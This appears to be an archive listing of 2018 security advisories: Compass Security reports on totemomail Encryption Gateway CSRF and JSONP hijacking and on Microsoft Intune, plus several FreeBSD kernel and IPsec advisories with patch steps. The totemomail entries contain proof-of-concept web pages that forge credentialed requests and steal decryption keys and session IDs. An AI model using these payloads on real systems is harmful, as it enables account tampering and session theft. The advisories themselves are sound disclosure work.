CVE-2018-11161, CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165, CVE-2018-11166, CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170, CVE-2018-11171, CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175, CVE-2018-11176, CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180, CVE
CSNC-2018-003 totemomail Encryption Gateway - Cross-Site Request Forgery
# # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # Product: totemomail Encryption Gateway # Vendor: totemo AG # CSNC ID: CSNC-2018-003 # CVE ID: CVE-2018-6563 # Subject: Cross-Site Request Forgery # Risk: High # Effect: Remotely exploitable # Author: Nicolas Heiniger <nicolas.heini...@compass-security.com> # Date: 14.05.2018 # Introduction: - The totemomail Encryption Gateway protects email communication with any external partner by encryption. It doesn't matter whether you exchange emails with technically savvy communication partners or with those who have neither an appropriate infrastructure nor the necessary know-how. The encryption gateway also makes it easy to securely send very large attachments.[1] Compass Security discovered a vulnerability in the webmail part of the solution. It is possible to predict all parameters that are required to execute actions on the webmail interface. This allows an attacker to perform Cross-Site Request Forgery (CSRF) attacks. The attacker needs to craft a malicious web page that will automatically send a request to the Encryption Gateway. If the user is logged in, the request will be executed by the Encryption Gateway on behalf of the logged in user. This could be used to change a user's settings, send emails or change contact informations. Affected: - Vulnerable: * 6.0.0_Build_371 No other version was tested but is is likely that older versions are affected as well. Technical Description - In the webmail, no anti-CSRF token is used. Although the viewState makes the attack more complex, it is possible to entirely predict the requests and thus, perform CSRF attacks. The requirement here is to perform the attack as a replay of a full user interaction. One has to replay every request to make sure that the viewState is updated on the server side and corresponds to the action that is performed by the malicious page. Such a malicious page is presented below, it will automatically send 3 requests that will change the user's detail: == function submitRequest1() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/webmail\/newMessage.xhtml", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded"); xhr.withCredentials = true; var body = "tabNavigationForm_SUBMIT=1&javax.faces.ViewState=An36[CUT BY COMPASS]XBJn&tabNavigationForm_j_id_24_j_id_26=tabNavigationForm$ var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } function submitRequest2() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true); xhr.setRequestHeader("Accept", "application\/xml, text\/xml, *\/*; q=0.01"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body = "javax.faces.partial.ajax=true&javax.faces.source=preferencesForm_phoneNumber_input_text&javax.faces.partial.execute=preferencesForm_phoneNumber_input_tex$ var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } function submitRequest3() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded"); xhr.withCredentials = true; var body = "preferencesForm_firstname_input_text=CSRF&preferencesForm_lastname_input_text=CSRF&preferencesForm_phoneNumber_input_text=%2B41+00+000+00+00&preferencesF
CSNC-2018-002 totemomail Encryption Gateway - JSONP hijacking
# # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # Product: totemomail Encryption Gateway # Vendor: totemo AG # CSNC ID: CSNC-2018-002 # CVE ID: CVE-2018-6562 # Subject: JSONP hijacking # Risk: High # Effect: Remotely exploitable # Author: Nicolas Heiniger <nicolas.heini...@compass-security.com> # Date: 14.05.2018 # Introduction: - The totemomail Encryption Gateway protects email communication with any external partner by encryption. It doesn't matter whether you exchange emails with technically savvy communication partners or with those who have neither an appropriate infrastructure nor the necessary know-how. The encryption gateway also makes it easy to securely send very large attachments.[1] Compass Security discovered a vulnerability in the process of decrypting a secure message sent to an external partner. This issue could lead to the user's session on the gateway being stolen. The encryption material for the encrypted email could also be stolen in the same way. Affected: - Vulnerable: * 6.0.0_Build_371 No other version was tested but is is likely that older versions are affected as well. Technical Description - When sending an encrypted email to a recipient outside of the organization, totemomail Encryption Gateway sends a so-called Envelope Message that includes an HTML file with the encrypted content and JavaScript to get the key from the gateway to decrypt the content. The key material is provided by the gateway through a JSONP callback that must be either authenticated using the email and password in the POST request or with an existing session ID. An example is provided below: == GET /responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey =160_1=jsonpCallback=[CUT BY COMPASS] =[CUT BY COMPASS]=&_=1515597892513 HTTP/1.1 Host: [CUT BY COMPASS] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=EF8E33D6DAD75F0394381AB7084DEA2D; oam.Flash.RENDERMAP.TOKEN=uy9dqvc4a Connection: close == The response contains the key material as well as the session ID: == HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/json;charset=UTF-8 Content-Length: 206 Date: Wed, 10 Jan 2018 15:26:17 GMT jsonpCallback({"iv": "AJD[CUT BY COMPASS]w==", "key": "OYP[CUT BY COMPASS]w=", "cipher": "AES\/CBC\/PKCS5Padding", "keyAlgo": "AES", "session": "EF8E33D6DAD75F0394381AB7084DEA2D"}); == The problem arises because the same request is accepted if a session already exists on the Encryption Gateway. In this case, the username and password are not required. This enables an attacker to create a malicious web page that will define a JavaScript function 'jsonpCallback' and insert a script tag with the source on the Encryption Gateway. This way, it is possible to retrieve the response in the callback if a logged in user visits the malicious page. An example of such a malicious page is given below, note that the user, password and mtan parameters are not required: == JSONP data and session stealing PoC function jsonpCallback(obj) { document.write('<p>Your data is:</p>'); document.write('<code>' + JSON.stringify(obj) + '</code>') } JSONP data and session stealing PoC https://[CUT</a> BY COMPASS]/responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey&messageId=160_1"> == The only issue one can run into, is to guess the message ID but as far as Compass was able to observe this is kept in a form XXX_YY where XXX is a 3-digits number and YY is a 1 or 2-digits number. This allows for a brute force attack even over the Internet. Workaround / Fix: - Install an up to date version of totemomail Encryption Gateway. As a developer, JSONP callbacks should not include sensitive information. If they need to, the request must include an unpredictable element. In this case a possibility would be to require the email and the password of the user even if the session is open. Timeline: - 2018-05-14: Coordinated public disclosure date 2018-04-XX: Release of fixed version 6.0_b567 2018-02-13: Initial vendor response 2018-02-09: Initial vendor notification 2018-02-02: Assigned CVE-2018-6562 2018-01-10: Discovery by Nicolas Heiniger References: --- [1] https://www.totemo.com/en/solutions/email-encryption/external-encryption
FreeBSD Security Advisory FreeBSD-SA-18:06.debugreg
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:06.debugreg Security Advisory The FreeBSD Project Topic: Mishandling of x86 debug exceptions Category: core Module: kernel Announced: 2018-05-08 Credits:Nick Peterson, Everdox Tech LLC https://www.linkedin.com/in/everdox Andy Lutomirski Affects:All supported versions of FreeBSD. Corrected: 2018-05-08 17:03:33 UTC (stable/11, 11.2-PRERELEASE) 2018-05-08 17:12:10 UTC (releng/11.1, 11.1-RELEASE-p10) 2018-05-08 17:05:39 UTC (stable/10, 10.4-STABLE) 2018-05-08 17:12:10 UTC (releng/10.4, 10.4-RELEASE-p9) CVE Name: CVE-2018-8897 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background On x86 architecture systems, the stack is represented by the combination of a stack segment and a stack pointer, which must remain in sync for proper operation. Instructions related to manipulating the stack segment have special handling to facilitate consistency with changes to the stack pointer. II. Problem Description The MOV SS and POP SS instructions inhibit debug exceptions until the instruction boundary following the next instruction. If that instruction is a system call or similar instruction that transfers control to the operating system, the debug exception will be handled in the kernel context instead of the user context. III. Impact An authenticated local attacker may be able to read sensitive data in kernel memory, control low-level operating system functions, or may panic the system. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, using either a binary or source code patch, and then reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install And reboot. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch.asc # gpg --verify debugreg.11.1.patch.asc [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch # fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch.asc # gpg --verify debugreg.10.4.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile and install your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r70 releng/10.4/ r71 stable/11/r69 releng/11.1/ r71 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrx3HhfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK/jhAAmPPCFZRMvbyG0VBCBqo5COFZ/32IMOWFDGMlsSi+CEgcGM51SzYZi97c zsT/2RgMsvBdggk41wvXqp1gKxgIbJe22af7l+D18e6rDEesueJqSiizcHmfGQul X
FreeBSD Security Advisory FreeBSD-SA-18:05.ipsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:05.ipsec Security Advisory The FreeBSD Project Topic: ipsec crash or denial of service Category: core Module: ipsec Announced: 2018-04-04 Credits:Maxime Villard Affects:All supported versions of FreeBSD. Corrected: 2018-01-31 09:24:48 UTC (stable/11, 11.1-STABLE) 2018-04-04 05:37:52 UTC (releng/11.1, 11.1-RELEASE-p9) 2018-01-31 09:26:28 UTC (stable/10, 10.4-STABLE) 2018-04-04 05:37:52 UTC (releng/10.4, 10.4-RELEASE-p8) 2018-04-04 05:37:52 UTC (releng/10.3, 10.3-RELEASE-p29) CVE Name: CVE-2018-6918 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background The IPsec suite of protocols provide network level security for IPv4 and IPv6 packets. FreeBSD includes software originally developed by the KAME project which implements the various protocols that make up IPsec. In IPsec, the IP Authentication Header (AH) is used to provide protection against replay attacks and connectionless integrity and data origin authentication for IP datagrams. II. Problem Description The length field of the option header does not count the size of the option header itself. This causes a problem when the length is zero, the count is then incremented by zero, which causes an infinite loop. In addition there are pointer/offset mistakes in the handling of IPv4 options. III. Impact A remote attacker who is able to send an arbitrary packet, could cause the remote target machine to crash. IV. Workaround No workaround is available. Note that in FreeBSD 10 IPsec is not included in the kernel by default, but it is in FreeBSD 11. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch # fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch.asc # gpg --verify ipsec.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r328621 releng/10.3/ r331985 releng/10.4/ r331985 stable/11/r328620 releng/11.1/ r331985 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6918> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:05.ipsec.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrEZuRfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKpOxAAlcyr88qHimXmMWNelNe+RvNkRoQwlmOw5XCWmWFGt4bX6KyrPSNVkZXK 9bZr0+sYiEjHPstXy+F6v95wqShRiefwpLVNJkP6LFKdQJeuxy0Uwsgl/i3aZVHy q4iM+PgnMwt5FxzmIcFHjwZSGGaOw5p9dMlkFLxXQ6chafPutMbgkXMIGVGXEp4e iwQgmh7j5LbUED0P9G7sYpcEN+DKZLW
FreeBSD Security Advisory FreeBSD-SA-18:04.vt
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:04.vt Security Advisory The FreeBSD Project Topic: vt console memory disclosure Category: core Module: vt console Announced: 2018-04-04 Credits:Dr Silvio Cesare of InfoSect Affects:All supported versions of FreeBSD. Corrected: 2018-04-04 05:24:59 UTC (stable/11, 11.1-STABLE) 2018-04-04 05:33:56 UTC (releng/11.1, 11.1-RELEASE-p9) 2018-04-04 05:26:33 UTC (stable/10, 10.4-STABLE) 2018-04-04 05:33:56 UTC (releng/10.4, 10.4-RELEASE-p8) 2018-04-04 05:33:56 UTC (releng/10.3, 10.3-RELEASE-p29) CVE Name: CVE-2018-6917 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background On FreeBSD 11 and later, and FreeBSD 10.x systems that boot via UEFI, the default system video console is provided by the vt(4) driver. The console allows the user, including an unprivileged user, to load a font at runtime. II. Problem Description Insufficient validation of user-provided font parameters can result in an integer overflow, leading to the use of arbitrary kernel memory as glyph data. Characters that reference this data can be displayed on the screen, effectively disclosing kernel memory. III. Impact Unprivileged users may be able to access privileged kernel data. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way; for example, a terminal buffer might include a user-entered password. IV. Workaround The syscons sc(4) system console is not affected by this issue and may be used on systems that do not boot via UEFI. To use the syscons console, set the kern.vty tunable in /boot/loader.conf as described in sc(4), and reboot. No workaround is available for systems that boot via UEFI. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install A reboot is required after the upgrade. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch # fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch.asc # gpg --verify vt.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r331983 releng/10.3/ r331984 releng/10.4/ r331984 stable/11/r331982 releng/11.1/ r331984 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6917> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:04.vt.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrEZttfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cI5CBAAmZS+2l3qNafZ0FQDKONeX+j
CSNC-2017-026 Microsoft Intune - Preserved Keychain Entries
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: Microsoft Intune [1] # Vendor: Microsoft # CSNC ID: CSNC-2017-026 # Subject: Preserved Keychain Entries # Risk: Medium # Effect: Locally exploitable # Author: Stephan Sekula <stephan.sek...@compass-security.com> # Date: 31.08.2017 # # Introduction: - Define a mobile management strategy that fits the needs of your organization. Apply flexible mobile device and app management controls that let employees work with the devices and apps they choose while protecting your company information. [1] Compass Security discovered a design weakness in Microsoft Intune's iOS Keychain management. This allows users to access company data even after the device has been unenrolled. Technical Description - If a user's device, which is enrolled with their company's MDM, is unenrolled, their Office access tokens are not removed from the iOS Keychain. Furthermore, the respective tokens are not invalidated on the server-side. Therefore, if the user reinstalls Office to their device after unenrollment, they may again obtain full access to the company's files. Workaround / Fix: - This issue can be fixed by invalidating the user's access token on the server- and client-side. In addition, the Keychain items could also be encrypted with a key stored in the app's data directory. Since this key is removed with the data directory on uninstallation of the app, this renders the Keychain entry useless. Timeline: - 2017-08-22 Discovery by Stephan Sekula 2017-09-17 Initial vendor notification 2017-09-18 Initial vendor response 2017-10-04 Asking vendor for update 2017-10-04 Vendor replies that engineers are working on reproducing the issue 2017-11-01 Asking vendor for an update 2017-11-02 Vendor replies - They are waiting for a partner team to respond on the case. 2018-01-08 Asking vendor for update - No response 2018-02-12 Asking vendor for update - No response 2018-03-19 Public disclosure References: --- [1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune
FreeBSD Security Advisory FreeBSD-SA-18:03.speculative_execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:03.speculative_execution Security Advisory The FreeBSD Project Topic: Speculative Execution Vulnerabilities Category: core Module: kernel Announced: 2018-03-14 Credits:Jann Horn (Google Project Zero); Werner Haas, Thomas Prescher (Cyberus Technology); Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz (Graz University of Technology); Paul Kocher; Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus); Yuval Yarom (University of Adelaide and Data6) Affects:All supported versions of FreeBSD. Corrected: 2018-02-17 18:00:01 UTC (stable/11, 11.1-STABLE) 2018-03-14 04:00:00 UTC (releng/11.1, 11.1-RELEASE-p8) CVE Name: CVE-2017-5715, CVE-2017-5754 Special Note: Speculative execution vulnerability mitigation is a work in progress. This advisory addresses the most significant issues for FreeBSD 11.1 on amd64 CPUs. We expect to update this advisory to include 10.x for amd64 CPUs. Future FreeBSD releases will address this issue on i386 and other CPUs. freebsd-update will include changes on i386 as part of this update due to common code changes shared between amd64 and i386, however it contains no functional changes for i386 (in particular, it does not mitigate the issue on i386). For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background Many modern processors have implementation issues that allow unprivileged attackers to bypass user-kernel or inter-process memory access restrictions by exploiting speculative execution and shared resources (for example, caches). II. Problem Description A number of issues relating to speculative execution were found last year and publicly announced January 3rd. Two of these, known as Meltdown and Spectre V2, are addressed here. CVE-2017-5754 (Meltdown) - This issue relies on an affected CPU speculatively executing instructions beyond a faulting instruction. When this happens, changes to architectural state are not committed, but observable changes may be left in micro- architectural state (for example, cache). This may be used to infer privileged data. CVE-2017-5715 (Spectre V2) - -- Spectre V2 uses branch target injection to speculatively execute kernel code at an address under the control of an attacker. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility, followed by a reboot into the new kernel: # freebsd-update fetch # freebsd-update install # shutdown -r now 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch.asc # gpg --verify speculative_execution-amd64-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details CVE-2017-5754 (Meltdown) - The mitigation is known as Page Table Isolation (PTI). PTI largely separates kernel and user mode page tables, so that even during speculative execution most of the kernel's data is unmapped and not accessible. A demonstration of the Meltdown vulnerability is available at https://github.com/dag-erling/meltdown. A positive result is definitive (that is, the vulnerability exists with certainty). A negative result indicates either that the CPU is not affected, or that the test is not capable of demonstr
FreeBSD Security Advisory FreeBSD-SA-18:01.ipsec [REVISED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:01.ipsec [REVISED]Security Advisory The FreeBSD Project Topic: ipsec validation and use-after-free Category: core Module: ipsec Announced: 2018-03-07 Credits:Maxime Villard Affects:All supported versions of FreeBSD. Corrected: 2018-02-24 13:04:02 UTC (stable/11, 11.1-STABLE) 2018-03-07 05:53:35 UTC (releng/11.1, 11.1-RELEASE-p7) 2018-03-07 16:55:15 UTC (stable/10, 10.4-STABLE) 2018-03-07 17:16:41 UTC (releng/10.4, 10.4-RELEASE-p7) 2018-03-07 17:16:41 UTC (releng/10.3, 10.3-RELEASE-p28) CVE Name: CVE-2018-6916 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. 0. Revision History v1.0 2018-03-07 Initial release. v1.1 2018-03-08 Correct patch for 10.x releases. I. Background The IPsec suite of protocols provide network level security for IPv4 and IPv6 packets. FreeBSD includes software originally developed by the KAME project which implements the various protocols that make up IPsec. In IPsec, the IP Authentication Header (AH) is used to provide protection against replay attacks and connectionless integrity and data origin authentication for IP datagrams. II. Problem Description Due to a lack of strict checking, an attacker from a trusted host can send a specially constructed IP packet that may lead to a system crash. Additionally, a use-after-free vulnerability in the AH handling code could cause unpredictable results. III. Impact Access to out of bounds or freed mbuf data can lead to a kernel panic or other unpredictable results. IV. Workaround No workaround is available, but systems not using IPsec are not vulnerable. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. And reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install And reboot the system 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. [*** v1.1 NOTE ***] If your 10.x sources were already patched using the initially published advisory patches, you need to apply the ipsec-10.rev1.patch. If you had not yet patched your 10.x sources, you need only apply the ipsec-10.patch file. 11.1 sources were correct in the initial release and do not need to be updated. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.x system not patched with the original SA-18:01 patch] # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch.asc # gpg --verify ipsec-10.patch.asc [FreeBSD 10.x that had been patched with the original SA-18:01 patch] # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.rev1.patch # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.rev1.patch.asc # gpg --verify ipsec-10.rev1.patch.asc [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch.asc # gpg --verify ipsec-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r330609 releng/10.3/ r330611 releng/10.4/ r330611 stable/11/r329907 releng/11.1/ r330566 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.f
FreeBSD Security Advisory FreeBSD-SA-18:01.ipsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:01.ipsec Security Advisory The FreeBSD Project Topic: ipsec validation and use-after-free Category: core Module: ipsec Announced: 2018-03-07 Credits:Maxime Villard Affects:All supported versions of FreeBSD. Corrected: 2018-02-24 13:04:02 UTC (stable/11, 11.1-STABLE) 2018-03-07 05:53:35 UTC (releng/11.1, 11.1-RELEASE-p7) 2018-03-07 05:47:48 UTC (stable/10, 10.4-STABLE) 2018-03-07 05:53:35 UTC (releng/10.4, 10.4-RELEASE-p6) 2018-03-07 05:53:35 UTC (releng/10.3, 10.3-RELEASE-p27) CVE Name: CVE-2018-6916 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background The IPsec suite of protocols provide network level security for IPv4 and IPv6 packets. FreeBSD includes software originally developed by the KAME project which implements the various protocols that make up IPsec. In IPsec, the IP Authentication Header (AH) is used to provide protection against replay attacks and connectionless integrity and data origin authentication for IP datagrams. II. Problem Description Due to a lack of strict checking, an attacker from a trusted host can send a specially constructed IP packet that may lead to a system crash. Additionally, a use-after-free vulnerability in the AH handling code could cause unpredictable results. III. Impact Access to out of bounds or freed mbuf data can lead to a kernel panic or other unpredictable results. IV. Workaround No workaround is available, but systems not using IPsec are not vulnerable. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. And reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install And reboot the system 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.x] # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch.asc # gpg --verify ipsec-10.patch.asc [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch.asc # gpg --verify ipsec-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r330565 releng/10.3/ r330566 releng/10.4/ r330566 stable/11/r329907 releng/11.1/ r330566 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6916> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:01.ipsec.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlqfhClfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD 